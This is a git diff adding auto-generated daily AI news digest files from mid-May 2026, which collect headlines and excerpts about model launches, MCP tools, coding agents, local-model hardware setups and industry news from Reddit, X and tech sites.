the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered "what was that conversation where I fixed the auth middleware?" — pickbrain finds it, and lets you resume the session directly. 
There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all… + +--- + +## [I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time](https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.86 +Tags: open_source, developer_tool, cli_tool + +> Hey everyone! Running Claude Code in the terminal is amazing, but I hated the "black box" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \*\*Argus\*\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \* \*\*Real-time Timeline:\*\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \* \*\*Dependency Graph:\*\* Visually maps out which files the agent is touching and how they connect. \* \*\*Cost & Loop Detection:\*\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus) + +--- + +## [Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo](https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. 
Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :) + +--- + +## [OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…](https://x.com/NanoGPTcom/status/2056425379171058008) +*X search / AI model updates* | 18/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to "flex" or + +--- + +## [Tried every Hermes Agent alternative so you don't have to (2026 roundup)](https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. 
Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \~4000 lines of Python you can actual… + +--- + +## [Configuration Qwen3.6-35b-a3b (12Gb VRAM)](https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\_K\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\_K\_M for this setup? For example, would Q4\_K\_M, Q6\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality? + +--- + +## [Qwen 35b a3b surprises me](https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. 
I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder if others have compared its performance against open source harnesses (Pi / opencode). + +--- + +## [xAI Launches Grok Build — Three-Way Coding War Is Now Open](https://x.com/Business_AI/status/2056374805163856261) +*Aligned News (Scoble)* | 18/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI. + +--- + +## [New models when? Forecasting release date.](https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about "open weights" + +--- + +## [Cutoff dates of open source models](https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> I was trying Qwen 3.6-27b and Gemma4 in a simple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was surprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI.
of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think + +--- + +## [Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models](https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \--- EDIT: Updated model list based on this thread's feedback... \[Original post body\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. 
\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c… + +--- + +## [memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client](https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.94 +Tags: mcp, tool_update + +> memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install "memvee[mcp]" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url="memory.db", default_user_id="alice", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport="streamable-http") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:… + +--- + +## [Every Markdown File You Write for AI is Already Lying to It](https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.70 +Tags: api_update, developer_tool + +> CLAUDE.md files. System prompts. 
README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. "Check package.json if this is stale." "Verify before running." "New packages may have been added since this was written." The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for… + +--- + +## [Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…](https://x.com/Shruti_0810/status/2056266132592468126) +*X / @shruti_0810* | 18/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. 
It scans your entire project and automatically recommends: → MCP servers → + +--- + diff --git a/data/digest-2026-05-19.md b/data/digest-2026-05-19.md new file mode 100644 index 0000000..ac18857 --- /dev/null +++ b/data/digest-2026-05-19.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-05-19** | 15 stories | Auto-generated from 634 archived stories + +--- + +## [Google launches Antigravity 2.0 with an updated desktop app and CLI tool](https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch, cli_tool, tool_update + +--- + +## [Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.](https://www.digg.com/ai/9p5cqkyn?rank=2) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [Anthropic just bought the company that generates most production MCP servers](https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. 
What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo… + +--- + +## [favorite Agentic Coding Harness](https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool, agent_tool + +> So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours? + +--- + +## [Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…](https://x.com/AlternativeTo/status/2056637498978398395) +*X / @alternativeto* | 19/05/2026 | Score: 0.86 +Tags: mcp, cli_tool, tool_update + +> Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. 
AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https://alternativeto.net/news/2026/5/tripsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ … + +--- + +## [Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration](https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch, tool_update + +--- + +## [Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.](https://www.digg.com/ai/r5p7scr1?rank=3) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?](https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows?
+ +--- + +## [OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over](https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k… + +--- + +## [Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates](https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). 
Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\_0). Test rig: RTX 3060 Laptop 6GB, \~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\_ctx on this GPU is… + +--- + +## [bytedance released an open source model that attempts to do just about anything with only 3b parameters](https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget. 
+ +--- + +## [How I built a 9-agent team where my agents actually talk to each other](https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: "senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br… + +--- + +## [We have sub-agents at home](https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. 
Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \`--slot-save-path\` and the \`s… + +--- + +## [Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)](https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/) +*Reddit r/ChatGPT* | 19/05/2026 | Score: 0.86 +Tags: cli_tool, tool_update + +> Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. 
We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t… + +--- + +## [Centralize SKILLs](https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 0.86 +Tags: open_source, agent_tool + +> We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this? 
+ +--- + diff --git a/data/digest-2026-05-20.md b/data/digest-2026-05-20.md new file mode 100644 index 0000000..152b39f --- /dev/null +++ b/data/digest-2026-05-20.md @@ -0,0 +1,107 @@ +# Stack Scout - AI News Digest +**2026-05-20** | 15 stories | Auto-generated from 630 archived stories + +--- + +## [Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments](https://www.digg.com/ai/xizlma81) +*Digg AI* | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +--- + +## [Put your spare Claude cycles on night shift: help review open-source packages](https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/) +*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.94 +Tags: open_source, developer_tool, cli_tool + +> Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. 
I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre… + +--- + +## [Re. what ever happened to Cohere’s Command-A series of models?](https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/) +*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. 
The feedback you give will almost certainly influence how we think about models and product going forwar… + +--- + +## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.](https://www.digg.com/ai/tvrhpn35?rank=1) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software](https://www.digg.com/ai/tvrhpn35) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race](https://x.com/koraykv/status/2056795667088204234) +*Aligned News (Scoble)* | 20/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks. + +--- + +## [Remove-AI-Watermarks – CLI and library for removing AI watermarks from images](https://github.com/wiltodelta/remove-ai-watermarks) +*Hacker News* | 19/05/2026 | Score: 0.88 +Tags: developer_tool, cli_tool + +--- + +## [Seven questions decide whether your AI agent ships. 
Most teams can answer two.](https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer) +*Nate's Newsletter* | Score: 0.82 +Tags: tool_update, agent_tool + +--- + +## [open source Gemini CLI](https://github.com/google-gemini/gemini-cli) +*Simon Willison's Blog* | Score: 0.74 +Tags: open_source, cli_tool + +--- + +## [Antigravity SDK](https://github.com/google-antigravity/antigravity-sdk-python) +*Simon Willison's Blog* | Score: 0.74 +Tags: api_update, developer_tool + +--- + +## [After a year in Claude Code, the thing slowing me down turned out to be me](https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/) +*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, "Is It Worth the Time?") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a "tell," a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. 
When an agent is ge… + +--- + +## [Stability AI releases a new audio model that can create 6-minute songs](https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.](https://www.digg.com/ai/1te0bqvt?rank=2) +*Digg AI* | Score: 1.00 +Tags: agent_tool + +--- + +## [AI server under 5k?](https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/) +*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 +Tags: developer_tool + +> I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation? + +--- + +## [under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]](https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/) +*Reddit r/MachineLearning* | 20/05/2026 | Score: 1.00 +Tags: mcp + +> I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like "rename this module and fix all imports" and "add input validation to these 12 endpoints." Routine cleanup, nothing requiring deep architectural thought. 
The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde… + +--- + diff --git a/data/digest-2026-05-21.md b/data/digest-2026-05-21.md new file mode 100644 index 0000000..5cdaf95 --- /dev/null +++ b/data/digest-2026-05-21.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-05-21** | 15 stories | Auto-generated from 634 archived stories + +--- + +## [Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)](https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool + +> Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you 